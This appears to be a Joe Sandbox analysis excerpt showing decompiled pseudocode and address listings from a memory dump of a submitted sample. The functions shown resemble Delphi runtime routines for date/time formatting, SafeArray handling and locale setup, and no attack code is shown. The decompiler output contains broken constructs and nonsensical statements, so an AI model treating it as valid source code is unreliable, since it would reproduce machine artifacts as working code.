    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
